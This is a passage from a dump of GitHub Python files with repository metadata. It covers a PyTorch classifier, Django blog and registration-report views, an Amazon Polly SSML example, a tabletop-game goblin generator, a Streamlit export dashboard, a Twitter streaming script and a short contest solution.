F.softmax(G_result)\n\n H_result = self.H_classifier(x)\n #H_result = F.softmax(H_result)\n\n I_result = self.I_classifier(x)\n #I_result = F.softmax(I_result)\n\n J_result = self.J_classifier(x)\n #J_result = F.softmax(J_result)\n\n\n #x = F.sigmoid(self.classifier2(x))\n #return x\n\n return [A_result,B_result,C_result,D_result,E_result,F_result,G_result,H_result,I_result,J_result]\n\n\n\nclass Classifier(nn.Module):\n\n def __init__(self,num_classes):\n super(Classifier, self).__init__()\n\n self.classifier1 = nn.Linear(1024,512)\n self.classifier2 = nn.Linear(512,num_classes)\n self.relu = nn.ReLU()\n\n\n def forward(self, x):\n x = self.relu(self.classifier1(x)) \n x = self.classifier2(x) \n\n return x","repo_name":"blendlee/Block-Classification","sub_path":"MTL/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70953585115","text":"from django.shortcuts import render, get_object_or_404, get_list_or_404, redirect\nfrom blog.models import YazilarModel, YorumModel\nfrom blog.forms import YorumEkleModelForm, yorum_ekle\nfrom django.views import View\nimport logging\n\nlogger = logging.getLogger('konu_okuma')\n\nclass DetayView(View):\n http_method_names = ['get', 'post']\n yorum_ekle_form = YorumEkleModelForm\n\n def get(self, request, slug):\n yazi = get_object_or_404(YazilarModel, slug=slug)\n logger.info('konu okundu: ' + request.user.username + \" \" + yazi.baslik )\n yorumlar = yazi.yorumlar.order_by('-id').filter(parent=None)\n yazi.bakis_sayi +=1\n yazi.save()\n\n context = {\n 'yazi' : yazi,\n 'yorumlar' : yorumlar,\n 'yorum_sayi' : len(yazi.yorumlar.all()),\n 'yorum_ekle_form' : self.yorum_ekle_form,\n }\n\n return render(request, 'pages/detay.html', context)\n\n def post(self, request, slug):\n yazi = get_object_or_404(YazilarModel, slug=slug)\n yorum_ekle_form = self.yorum_ekle_form(request.POST)\n if yorum_ekle_form.is_valid():\n yorum = yorum_ekle_form.save(commit=False)\n yorum.yazan = request.user\n yorum.yazi = yazi\n if request.POST.get('answer') != 'A':\n yorum.parent = get_object_or_404(YorumModel, id=request.POST.get('answer'))\n yorum.save()\n return redirect('detay', slug=yazi.slug)\n\n","repo_name":"adamorujov/djproject1","sub_path":"blog/views/detay.py","file_name":"detay.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20025396950","text":"import asyncio\n\nfrom aiopolly import Polly\nfrom aiopolly.types import AudioFormat, VoiceID, TextType\nfrom aiopolly.types import LanguageCode\nfrom aiopolly.utils.ssml import ssml_text, prosody, emphasis, pause, lang, paragraph, phoneme, sentence\nfrom aiopolly.utils.ssml.params import Level, Volume, Pitch, Alphabet, Rate, Strength\n\nwith_pause = f'Mary had a little lamb {pause(seconds=3)}Whose fleece was white as snow.'\n\nwith_emphasis = f'I already told you I {emphasis(\"really like\", level=Level.strong)} that person.'\n\nwith_foreign_text = lang('Je ne parle pas français', language_code=LanguageCode.fr_FR)\n\nparagraphs = paragraph('This is the first paragraph. There should be a pause after this text is spoken.',\n 'This is the second paragraph')\n\nwith_phonemes = (f'You say, {phoneme(\"pecan\", alphabet=Alphabet.ipa, ph=\"pɪˈkɑːn\")}. '\n f'I say, {phoneme(\"pecan\", alphabet=Alphabet.ipa, ph=\"ˈpi.kæn\")}.')\n\nwith_prosody = (f'Each morning when I wake up, {prosody(\"I speak quite slowly\", volume=\"loud\", rate=\"x-slow\")}'\n ' and deliberately until I have my coffee')\n\nsentences = sentence(\n 'Mary had a little lamb',\n 'Whose fleece was white as snow,',\n 'And everywhere that Mary went, the lamb was sure to go.'\n)\n\nsuper_fast = prosody(\n f'''\nUh, sama lamaa duma lamaa you assuming I'm a human\\\nWhat I gotta do to get it through to you I'm superhuman\\\nInnovative and I'm made of rubber\\\nSo that anything you say is ricocheting off of me and it'll glue to you\\\nI'm devastating more than ever demonstrating\\\nHow to give a motherfuckin' audience a feeling like it's levitating\\\nNever fading and I know that the haters are forever waiting\\\nFor the day that they can say I fell off they'd be celebrating\\\n'Cause I know the way to get 'em motivated, ''',\n rate=Rate.x_fast, volume=Volume.x_loud, pitch=Pitch.high\n)\n\n\nasync def main():\n # Creating a new Polly instance with default output format 'mp3'\n polly = Polly(output_format=AudioFormat.mp3)\n\n text = ssml_text(\n with_pause,\n with_emphasis,\n with_foreign_text,\n with_phonemes,\n with_prosody,\n paragraphs,\n sentences,\n super_fast,\n sep=pause(Strength.x_strong)\n )\n\n # Synthesizing speech with lexicon we just created\n # (we don't need to specify required param \"output_format\", as we using mp3 by default)\n speech = await polly.synthesize_speech(text, voice_id=VoiceID.Matthew, text_type=TextType.ssml)\n\n # Saving speech on disk with default name\n await speech.save_on_disc(directory='speech')\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n","repo_name":"Bobronium/aiopolly","sub_path":"examples/using_ssml.py","file_name":"using_ssml.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"50"} +{"seq_id":"421516112","text":"from bisect import bisect\r\nfrom random import seed\r\nfrom dice import roll\r\n\r\nfrom ancestry.character import Character\r\n\r\n\r\ngoblin_background = {\r\n 1: (\"You spent the last {} year(s) in a drunken stupor. you are not proud.\", \"roll('1d6t')\"),\r\n 2: (\"The Goblin King turned you into a toad. You escaped that fate after you convinced an Elf maiden to kiss \"\r\n \"you. When she did and screamed, you killed her. You start the game with 1 Corruption.\", \"None\"),\r\n 3: (\"You accidently got your entire tribe killed.\", \"None\"),\r\n 4: (\"You were orphaned and raised by giant rats.\", \"None\"),\r\n 5: (\"You accidentally released a demon into the world.\", \"None\"),\r\n 6: (\"You spent two days believing you were a fearsome dog. You start the game with 1 Insanity.\", \"None\"),\r\n 7: (\"A hag made you her love slave for {} years.\", \"roll('1d6t')\"),\r\n 8: (\"Dwarfs almost wiped out your tribe. You are one of {} survivors.\", \"roll('1d6t')\"),\r\n 9: (\"You nearly drowned when the sewers flooded.\", \"None\"),\r\n 10: (\"You earned a living working in your profession.\", \"None\"),\r\n 11: (\"Choose a character. He or she saved your life and you now owe that character a debt.\", \"None\"),\r\n 12: (\"You are an unrepentant criminal. Add a random criminal profession to your list of professions.\", \"None\"),\r\n 13: (\"You traveled extensively. You speak one additional language.\", \"None\"),\r\n 14: (\"You stole a knife from a dashing knight.\", \"None\"),\r\n 15: (\"You snuck into Alfheim and stole a lock of hair from the Faerie Queen.\", \"None\"),\r\n 16: (\"You killed and ate 100 diseased rats.\", \"None\"),\r\n 17: (\"You were a henchman to a powerful wizard.\", \"None\"),\r\n 18: (\"You found a signet ring in a sewer.\", \"None\"),\r\n 19: (\"You are the seventeenth son or daughter of the Goblin King.\", \"None\"),\r\n 20: (\"You came into money and start the game with {} cp.\", \"roll('2d6t')\"),\r\n}\r\n\r\n\r\ndef roll_goblin_background(dice_roll):\r\n background, rand = goblin_background[dice_roll]\r\n return background.format(eval(rand))\r\n\r\n\r\ngoblin_personality_breakpoints = [4, 5, 7, 9, 13, 15, 17, 18]\r\ngoblin_personalities = [\r\n \"You are a bully and enjoy tormenting things that are weaker than you.\",\r\n \"You like violence, especially when it’s random and senseless.\",\r\n \"You try to rise above the filth and squalor of your people to do good in the world.\",\r\n \"You love playing tricks on other people and find their pain hilarious!\",\r\n \"You look out for yourself. To hell with everyone else!\",\r\n \"You’re just trying to stay alive!\",\r\n \"Your people didn’t deserve exile, but exile you got. You believe you will make places for yourselves and prove \"\r\n \"to those stinking elves they were wrong.\",\r\n \"You live to serve the strong and mighty.\",\r\n \"You hope to redeem your people in the eyes of the Faerie Queen.\"\r\n]\r\n\r\n\r\ndef roll_goblin_personality(dice_roll):\r\n return goblin_personalities[bisect(goblin_personality_breakpoints, dice_roll)]\r\n\r\n\r\ngoblin_odd_habit = {\r\n 1: \"You save all your secretions in small bottles and give them as gifts to people you like.\",\r\n 2: \"You never bathe.\",\r\n 3: \"You punctuate your sentences by spitting.\",\r\n 4: \"You have tremendous flatulence, yet you seem never to notice when you break wind.\",\r\n 5: \"You eat only candy.\",\r\n 6: \"You collect the genitals from creatures you kill and wear them as jewelry.\",\r\n 7: \"You lick things to claim them as your own.\",\r\n 8: \"You dress in fancy clothes.\",\r\n 9: \"You refuse to wear shoes.\",\r\n 10: \"You keep cockroaches as pets.\",\r\n 11: \"You always inspect your bowel movements, spreading the mess around with your fingers.\",\r\n 12: \"You keep a bit of iron on your person at all times.\",\r\n 13: \"You speak in a singsong voice.\",\r\n 14: \"You eat a bit of flesh from any living thing you kill.\",\r\n 15: \"You cry a lot.\",\r\n 16: \"You tell filthy jokes at inappropriate times.\",\r\n 17: \"You wear a child’s costume and refuse to take it off.\",\r\n 18: \"You keep a large collection of spoons.\",\r\n 19: \"You like to hide.\",\r\n 20: \"Make something up!\",\r\n}\r\n\r\n\r\ndef roll_goblin_odd_habit(dice_roll):\r\n return goblin_odd_habit[dice_roll]\r\n\r\n\r\ngoblin_appearance = {\r\n 1: (\"You have a long, pointed nose.\", \"None\"),\r\n 2: (\"You have bright green or orange skin.\", \"None\"),\r\n 3: (\"You have the head of a dog.\", \"None\"),\r\n 4: (\"You have a reptilian appearance with small horns sprouting from the top of your head.\", \"None\"),\r\n 5: (\"You have a wide, leering grin.\", \"None\"),\r\n 6: (\"You have a pig’s snout in place of a nose.\", \"None\"),\r\n 7: (\"You have long, slender fingers.\", \"None\"),\r\n 8: (\"You have a tooth growing out from your forehead.\", \"None\"),\r\n 9: (\"You have a tail.\", \"None\"),\r\n 10: (\"Fur grows thickly on your arms and legs.\", \"None\"),\r\n 11: (\"You are completely hairless.\", \"None\"),\r\n 12: (\"You have all the warts.\", \"None\"),\r\n 13: (\"A large cyst grows on your back.\", \"None\"),\r\n 14: (\"You have an abnormally long and pointed chin.\", \"None\"),\r\n 15: (\"A single horn grows out from the side of your head.\", \"None\"),\r\n 16: (\"You have one eye.\", \"None\"),\r\n 17: (\"You have {} extra fingers, placed on your body wherever you wish.\", \"roll('1d6t')\"),\r\n 18: (\"You have enormous ears.\", \"None\"),\r\n 19: (\"You have stubby little legs.\", \"None\"),\r\n 20: (\"Make something up!\", \"None\"),\r\n}\r\n\r\n\r\ndef roll_goblin_appearance(dice_roll):\r\n appearance, rand = goblin_appearance[dice_roll]\r\n return appearance.format(eval(rand))\r\n\r\n\r\ngoblin_ages_breakpoints = [4, 8, 13, 16, 18]\r\ngoblin_ages = [\r\n ('You are a child, 6 years old or younger.', 'None'),\r\n ('You are an adolescent, {} years old.', 'roll(\"1d4+6\")'),\r\n ('You are a young adult, {} years old.', 'roll(\"1d15+10\")'),\r\n ('You are a middle-aged adult, {} years old.', 'roll(\"1d25+25\")'),\r\n ('You are an older adult, {} years old.', 'roll(\"1d25+50\")'),\r\n ('You are a venerable adult, 76 years old or older.', 'None')\r\n]\r\n\r\n\r\ndef roll_goblin_age(dice_roll):\r\n age, rand = goblin_ages[bisect(goblin_ages_breakpoints, dice_roll)]\r\n return age.format(eval(rand))\r\n\r\n\r\ngoblin_build_breakpoints = [4, 5, 7, 9, 13, 15, 17, 18]\r\ngoblin_build = [\r\n 'You are short and spindly.',\r\n 'You are short and round.',\r\n 'You are short.',\r\n 'You are wiry.',\r\n 'You fall within the normal height and weight ranges for goblins.',\r\n 'You are pudgy.',\r\n 'You are tall.',\r\n 'You are tall and lanky.',\r\n 'You are very tall and heavy.',\r\n]\r\n\r\n\r\ndef roll_goblin_build(dice_roll):\r\n return goblin_build[bisect(goblin_build_breakpoints, dice_roll)]\r\n\r\n\r\ndef roll_goblin():\r\n print(roll_goblin_background(roll('1d20t')))\r\n print(roll_goblin_personality(roll('3d6t')))\r\n print(roll_goblin_odd_habit(roll('1d20t')))\r\n print(roll_goblin_appearance(roll('1d20t')))\r\n print(roll_goblin_build(roll('3d6t')))\r\n print(roll_goblin_age(roll('3d6t')))\r\n\r\n\r\nclass Goblin(Character):\r\n def __init__(self, s=None):\r\n if s:\r\n seed(s)\r\n self.ancestry = 'Goblin'\r\n self.age = roll_goblin_age(roll('3d6t'))\r\n self.build = roll_goblin_build(roll('3d6t'))\r\n self.appearance = roll_goblin_appearance(roll('3d6t'))\r\n self.odd_habit = roll_goblin_odd_habit(roll('1d10t'))\r\n self.background = roll_goblin_background(roll('1d20t'))\r\n self.personality = roll_goblin_personality(roll('3d6t'))\r\n super().__init__()\r\n\r\n def __str__(self):\r\n return (f\"Age: {self.age}\\nBuild: {self.build}\\nAppearance: {self.appearance}\\nOdd Habit: {self.odd_habit}\\n\"\r\n f\"Background: {self.background}\\nPersonality: {self.personality}\\nFirst profession: \"\r\n f\"{self.professions[0]}\\nSecond Profession: {self.professions[1]}\\nInteresting Thing: \"\r\n f\"{self.intersting_thing}\\nWealth: {self.wealth}\")\r\n\r\n def __repr__(self):\r\n return f'Class: {self.ancestry}'\r\n\r\n\r\nif __name__ == '__main__':\r\n warwick = Goblin('Warwick')\r\n print(warwick)\r\n","repo_name":"jmtaysom/sotdl","sub_path":"src/ancestry/goblin.py","file_name":"goblin.py","file_ext":"py","file_size_in_byte":8042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"69866292315","text":"import numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport streamlit as st\nimport calendar\nimport altair as alt\n\ndef app():\n header = '''\n

Market Insights (For Suppliers)

\n

\n This dashboard provides suppliers with a visual representation of the global demand for textile materials and products\n geographically and temporally. This will help suppliers know a country's demand and \n determine the best products and materials to export their products to, \n as well as the best time of the year to export textiles.\n

\n '''\n st.markdown(header, unsafe_allow_html = True)\n\n # Load the data\n supplier_df = pd.read_csv(\"data/supplier_dataset.csv\")\n\n ## Treemap 1 - Country demand\n\n supplier_agg = supplier_df.groupby('countries_exported')['qty_exported'].sum().sort_values(ascending=False)\n df = pd.DataFrame(supplier_agg).reset_index()\n\n # st.write(df)\n continent = ['Asia', 'Asia', 'Asia', 'Asia', 'North America', 'Asia', 'Asia', 'Europe', 'Asia', 'Asia', 'Asia', 'Asia', 'Europe', 'Europe', 'Europe', 'Europe', 'Europe', 'Europe', 'Asia', 'Europe']\n\n df['continent'] = continent\n\n st.subheader(\"Country and Continent\")\n # desc1 = \"\"\"\n #

This treemap shows the quantity of textile products exported \n # by different countries around the world, grouped by continent.

\"\"\"\n st.caption(\"This treemap shows the quantity of textile products exported by different countries around the world, grouped by continent\")\n\n fig = px.treemap(df, \n path=[px.Constant(\"World\"), 'continent', 'countries_exported'], \n values='qty_exported',\n color='continent',\n color_continuous_scale='RdBu')\n # color_discrete_sequence=['purple', 'green', 'dark blue', 'salmon'])\n fig.data[0].hovertemplate = '%{label}
Quantity Exported:%{value}'\n st.plotly_chart(fig)\n\n\n\n\n ## Treemap 2 - Month of exports\n\n st.subheader(\"Year and Month\")\n\n # desc2 = \"\"\"\n #

This treemap shows the quantity of products exported \n # by different countries around the world, grouped by year and month of export.

\"\"\"\n st.caption(\"This treemap shows the quantity of products exported by different countries around the world, grouped by year and month of export.\")\n\n df2 = supplier_df.groupby(['month_of_export', 'year_of_export'])['qty_exported'].sum()\n df2 = pd.DataFrame(df2).reset_index()\n \n # Define a dictionary to map month numbers to their names\n month_names = {\n 1: 'Jan',\n 2: 'Feb',\n 3: 'Mar',\n 4: 'Apr',\n 5: 'May',\n 6: 'Jun',\n 7: 'Jul',\n 8: 'Aug',\n 9: 'Sep',\n 10: 'Oct',\n 11: 'Nov',\n 12: 'Dec'\n }\n\n # Replace month numbers with their names\n df2['month_of_export'] = df2['month_of_export'].replace(month_names)\n\n # Sort the DataFrame by the \"month_of_export\" column\n df2 = df2.sort_values(by=['year_of_export', 'month_of_export'], ascending=[True, True])\n\n # st.write(df2)\n\n fig2 = px.treemap(df2, \n path=[px.Constant(\"Year\"), 'year_of_export', 'month_of_export'], \n values='qty_exported',\n color='year_of_export',\n color_continuous_scale='RdBu')\n fig2.data[0].hovertemplate = '%{label}
Quantity Exported:%{value}'\n st.plotly_chart(fig2)\n\n\n ## Treemap 3 - Type of Products and materials\n st.subheader(\"Type of Product and Material\")\n\n # desc3 = \"\"\"\n #

This treemap shows the quantity of textile products exported by \n # different countries around the world, grouped by type of product and textile material.

\"\"\"\n st.caption(\"This treemap shows the quantity of textile products exported by different countries around the world, grouped by type of product and textile material.\")\n\n\n df3 = supplier_df.groupby(['textile_type', 'type_of_product'])['qty_exported'].sum().sort_values(ascending=False)\n df3 = df3.reset_index()\n fig3 = px.treemap(df3, \n path=['textile_type', 'type_of_product'], \n values='qty_exported',\n color='textile_type',\n color_continuous_scale='RdBu')\n fig3.data[0].hovertemplate = '%{label}
Quantity Exported:%{value}'\n st.plotly_chart(fig3)\n\n\n ### 4 - Bar Chart for Month of Exports\n st.subheader(\"Trend for Month of Exports\")\n\n # desc4 = \"\"\"\n #

This is a bar chart that shows the overall distribution in the quantity of \n # textile products exported each month.

\"\"\"\n st.caption(\"This is a bar chart that shows the overall distribution in the quantity of textile products exported each month. \")\n\n df4 = supplier_df.groupby(['year_of_export', 'month_of_export'])['qty_exported'].sum()\n df4 = df4.reset_index()\n months = [calendar.month_name[i][:3] for i in range(1, 13)]\n # st.write(months)\n df4['month_of_export'] = pd.Categorical(df4['month_of_export'], categories=months, ordered=True)\n\n # sort the dataframe by month_of_export column\n df4 = df4.sort_values('month_of_export')\n # st.write(df4)\n\n # st.write(df)\n\n # Create the bar chart\n fig4 = px.bar(df4, \n x='month_of_export', \n y='qty_exported',\n color='qty_exported',\n color_discrete_sequence='RdBu')\n\n st.plotly_chart(fig4)\n\n ### 5 - Time Series Line Graph of Sales (per product)\n st.subheader(\"Demand for Textile Product Over the Years\")\n\n # desc5 = \"\"\"\n #

This is a time series line chart for the quantity \n # of your selected textile product exported each year, to better estimate the product's life cycle.\n #

\"\"\"\n st.caption(\"This is a time series line chart for the quantity of your selected textile product exported each year, to better estimate the product's life cycle.\")\n\n df5 = supplier_df.groupby(['year_of_export', 'type_of_product'])['qty_exported'].sum()\n df5 = df5.reset_index()\n\n # filter dataframe by type_of_product\n product = st.selectbox('Select Product', df5['type_of_product'].unique())\n df_product = df5[df5['type_of_product'] == product]\n\n\n # create time series chart using Altair\n fig5 = px.line(df_product, x=\"year_of_export\", y=\"qty_exported\")\n\n # show chart in Streamlit\n st.plotly_chart(fig5)\n\n\n\n\nif __name__ == '__main__':\n app()\n","repo_name":"weilunteo/STYLELAR-Dashboard","sub_path":"apps/supplier_dashboard_app.py","file_name":"supplier_dashboard_app.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34652062094","text":"import os\nimport tweepy\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\nimport socket\nimport json\nimport re\n \n#read keys from a seperate file, for github privacy\nwith open(\"config.json\",\"r\") as key:\n keys = json.load(key)\n access_token = keys['access_token']\n access_secret = keys['access_secret']\n consumer_key = keys['consumer_key']\n consumer_secret = keys['consumer_secret']\n\n#Boiler plate code. Socket Logic \nclass TweetsListener(StreamListener):\n\n def __init__(self, csocket):\n self.client_socket = csocket\n\n #to me, it makes sense to clean data before it's passed to spark.\n #reduce workload in the long run by doing it once\n def clean_tweet(self,tweet):\n tweet = re.sub(r'^RT ','',tweet) # remove the RT from retweets\n tweet = re.sub(r'@[^\\s]+','',tweet) # remove @mentions\n tweet = re.sub(r\"\\S*https?:\\S*\",'',tweet) #remove URL\n tweet = re.sub(r'\\\\+u\\S*','',tweet) #unicode\n tweet = re.sub(r'[^A-Za-z0-9 ]','',tweet) #remove special\n tweet = re.sub(r'[ \\n\\r]{2,}',' ',tweet) #remove exccess spaces\n tweet = tweet.strip().lower() #cleanup space remove, force lower\n return tweet\n\n def on_data(self, data):\n print(\"ONDATA\")\n try:\n #Dump the json\n tweet = json.loads(data)\n #print(tweet)\n\n #Retweets are annoyingly differently formatted\n if 'RetweetedStatus' in tweet:\n print(\"Retweet:\")\n tweet = tweet['retweeted_status']['extended_tweet']['full_text']\n else:\n print(\"Original Tweet:\")\n if 'extended_tweet' in tweet:\n tweet = tweet['extended_tweet']['full_text']\n else:\n tweet = tweet['text']\n print(\"Raw Tweet:\",tweet)\n tweet = self.clean_tweet(str(tweet))\n print(\"Cleaned Tweet: {}\".format(tweet))\n\n tweet+=\"\\r\\n\"\n\n self.client_socket.sendall(tweet.encode('utf-8'))\n return True\n except Exception as e:\n print(\"Error on_data: %s\" % str(e))\n return True\n \n def on_error(self, status):\n print(status)\n return True\n \ndef sendData(c_socket):\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n \n twitter_stream = Stream(auth, TweetsListener(c_socket))\n twitter_stream.filter(track=['trump'])\n \nif __name__ == \"__main__\":\n s = socket.socket() \n host = \"localhost\" \n port = 5555 \n s.bind((host, port))\n \n print(\"Listening on Port {}.\".format(port))\n \n s.listen(1) \n c, addr = s.accept() \n \n sendData( c )\n","repo_name":"JaimeNufio/TwitterStreamingSentimentAnalysis","sub_path":"GetTweets.py","file_name":"GetTweets.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"30117055653","text":"import io\r\nimport sys\r\n_INPUT=\"\"\"\\\r\n2 2\r\n\"\"\"\r\nsys.stdin=io.StringIO(_INPUT)\r\na,b=map(int,input().split())\r\n#x,y,z<=a\r\n#x+y+z=b\r\n#0<=b<=3a\r\nans=0\r\nfor x in range(a+1):\r\n #y+z=b-x\r\n minn=min(a,b-x)\r\n for y in range(minn+1):\r\n z=b-x-y\r\n if 0<=z and z<=a:\r\n ans+=1\r\nprint(ans)\r\n","repo_name":"yone-m/Atcoder","sub_path":"ABC_others/ABC051_B.py","file_name":"ABC051_B.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6502836849","text":"from django.contrib.auth.decorators import permission_required\nfrom django.http import HttpResponse, HttpResponseNotFound, HttpResponseBadRequest\nfrom django.shortcuts import render\nfrom collections import OrderedDict\n\nfrom registration.models import Person, RegistrationSession, Registration, MembershipCard\nfrom registration import lib\n\nfrom lists.models import List, QueryList\nfrom lists.lib import parseQueryList, ListParseException\n\nimport xlsxwriter\nfrom io import BytesIO\n\n#All available report headers, used for report display\nHEADERS = {\n\t'first_name': 'First Name',\n\t'last_name': 'Last Name',\n\t'name': 'Name',\n\t'gender': 'Gender',\n\t'phone_number': 'Phone Number',\n\t'peoplesoft_number': 'Peoplesoft Number',\n\t'netid': 'NetID',\n\t'hometown': 'Hometown',\n\t'major': 'Major',\n\t'person_id': 'Person ID',\n\t'emails': 'All e-mail address(es)',\n\t'preferred_emails': 'E-mail address(es) the user preferrers',\n\t'uconn_email': 'E-mail address',\n\t'membership_card': 'Membership Card',\n\t'registration_session': 'Semester',\n\t'usg_person_type': 'Registration Classification',\n\t'semester_standing': 'Semester Standing',\n\t'person_type': 'Registration Classification',\n\t'team': 'Team/Club',\n\t'paid_amount': 'Amount Paid',\n\t'paid_date': 'Paid Date',\n\t'registration_id': 'Registration ID',\n}\n\n#Attributes that can be lifted straight off the person record\nPERSONATTRS = {\n\t'first_name': 'first_name',\n\t'last_name': 'last_name',\n\t'gender': 'gender',\n\t'phone_number': 'phone_number',\n\t'peoplesoft_number': 'peoplesoft_number',\n\t'netid': 'netid',\n\t'hometown': 'hometown',\n\t'major': 'major',\n\t'person_id': 'id',\n\t'name': 'name',\n}\n\n#Attributes that can me lifted straight off the registration.person_type record\nPERSONTYPEATTRS = {\n\t'usg_person_type': 'usg_person_type',\n\t'semester_standing': 'csc_semester_standing',\n\t'person_type': 'description'\n}\n\n#Attributes that can be lifted straight off the registration record\nREGISTRATIONATTRS = {\n\t'registration_id': 'id',\n\t'paid_amount': 'paid_amount'\n}\n\n#Attributes that require the registration to be completed, aside from those listed in the direct accessors above\nREGISTRATIONREQUIREDEXTRAATTRS = ('membership_card', 'registration_session', 'team', 'paid_amount', 'paid_date')\n\n#Attributes that will require the registration to be computed\nREGISTRATIONREQUIREDFIELDS = set(REGISTRATIONATTRS.keys()) | set(REGISTRATIONREQUIREDEXTRAATTRS) | set(PERSONTYPEATTRS.keys())\n\n\ndef reportData(people, fields, sessionPriority):\n\tregistrationRequired = False\n\t\n\tfor f in fields:\n\t\tif f in REGISTRATIONREQUIREDFIELDS:\n\t\t\tregistrationRequired = True\n\t\n\t\t\trows = []\n\n\t\t\tdef getRegistration(p):\n\t\t\t\tfor rs in sessionPriority:\n\t\t\t\t\ttry:\n\t\t\t\t\t\treturn Registration.objects.get(person=p, registration_session=rs)\n\t\t\t\t\texcept Registration.DoesNotExist:\n\t\t\t\t\t\tcontinue\n\n\tfor p in sorted(people, key=lambda x: (x.last_name.lower(), x.first_name.lower())):\n\t\trow = []\n\n\t\tif registrationRequired:\n\t\t\tregistration = getRegistration(p)\n\t\telse:\n\t\t\tregistration = None\n\n\t\tfor f in fields:\n\t\t\tif f in PERSONTYPEATTRS:\n\t\t\t\tif registration:\n\t\t\t\t\trow.append(getattr(registration.person_type, PERSONTYPEATTRS[f]))\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f in PERSONATTRS:\n\t\t\t\trow.append(getattr(p, PERSONATTRS[f]))\n\n\t\t\t\tcontinue\n\n\t\t\tif f in REGISTRATIONATTRS:\n\t\t\t\tif registration:\n\t\t\t\t\trow.append(getattr(registration, REGISTRATIONATTRS[f]))\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'membership_card':\n\t\t\t\tif registration:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tmc = MembershipCard.objects.get(registration=registration)\n\t\t\t\t\t\trow.append(mc.membership_card)\n\t\t\t\t\texcept MembershipCard.DoesNotExist:\n\t\t\t\t\t\trow.append(\"None\")\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"None\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'registration_session':\n\t\t\t\tif registration:\n\t\t\t\t\trow.append(registration.registration_session.card_code)\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'gender':\n\t\t\t\tif p.gender == 'M':\n\t\t\t\t\trow.append('Male')\n\t\t\t\telif p.gender == 'F':\n\t\t\t\t\trow.append('Female')\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'team':\n\t\t\t\tif registration and registration.team:\n\t\t\t\t\trow.append('Team')\n\t\t\t\telif registration and not registration.team:\n\t\t\t\t\trow.append('Club')\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"Unknown\")\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'paid_date':\n\t\t\t\tif registration and registration.paid_date:\n\t\t\t\t\trow.append(registration.paid_date.strftime(\"%Y-%m-%d\"))\n\t\t\t\telse:\n\t\t\t\t\trow.append(\"N/A\")\n\n\t\t\t\tcontinue\t\n\n\t\t\tif f == 'emails':\n\t\t\t\trow.append(\", \".join([e.email for e in p.emails.all()]))\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'preferred_emails':\n\t\t\t\trow.append(\", \".join([e.email for e in p.emails.filter(send=True)]))\n\n\t\t\t\tcontinue\n\n\t\t\tif f == 'uconn_email':\n\t\t\t\trow.append(\", \".join([e.email for e in p.emails.filter(email__contains=\"@uconn.edu\")]))\n\n\t\t\t\tcontinue\n\n\n\n\t\tyield row\n\ndef htmlReport(request, headers, data):\n\tdata = list(data)\n\treturn render(request, \"dashboard_report.html\", {'data': data, 'headers': headers, 'count': len(data)})\n\t\ndef excelReport(request, headers, data):\n\tout = BytesIO()\n\t\n\tworkbook = xlsxwriter.Workbook(out)\n\tworksheet = workbook.add_worksheet()\n\t\n\tbold = workbook.add_format({'bold': 1})\n\t\n\tfor i, h in enumerate(headers):\n\t\tworksheet.write(0, i, h, bold)\n\t\n\tfor i, row in enumerate(data):\n\t\tfor j, item in enumerate(row):\n\t\t\tworksheet.write(i+1, j, item)\n\t\t\t\n\tworkbook.close()\n\t\n\tresponse = HttpResponse(content_type='application/vnd.ms-excel')\n\tresponse['Content-Disposition'] = 'filename=\"roster.xlsx\"'\n\t\n\tresponse.write(out.getvalue())\n\t\n\treturn response\n\n@permission_required('registration.can_run_reports')\ndef index(request):\t\n\tmanagedLists = {}\n\t\n\tfor l in List.objects.exclude(list_type__in=['admin_list', 'entry_list']):\n\t\tlistType = l.get_list_type_display()\n\t\tif listType not in managedLists:\n\t\t\tmanagedLists[listType] = {}\n\t\t\n\t\tprint (l)\n\n\t\ttry:\n\t\t\tsemester, listName = l.slug.split('-', 1)\n\t\texcept ValueError as e:\n\t\t\tprint(\"Could not process %s as a semester list\" % l.slug)\n\t\t\tprint(e)\n\t\t\tcontinue\n\n\t\tif semester not in managedLists[listType]:\n\t\t\tmanagedLists[listType][semester] = []\n\t\tmanagedLists[listType][semester].append(l)\n\t\n\tsortedManagedLists = OrderedDict()\n\t\t\t\n\tfor listType in managedLists:\n\t\tsortedManagedLists[listType] = OrderedDict()\n\t\t\n\t\tsemestersDict = managedLists[listType]\n\t\t\n\t\tfor semesterCode in reversed(sorted(semestersDict, key=lib.registrationCardCodeKey)):\n\t\t\tsortedManagedLists[listType][semesterCode] = sorted(semestersDict[semesterCode], key=lambda x: 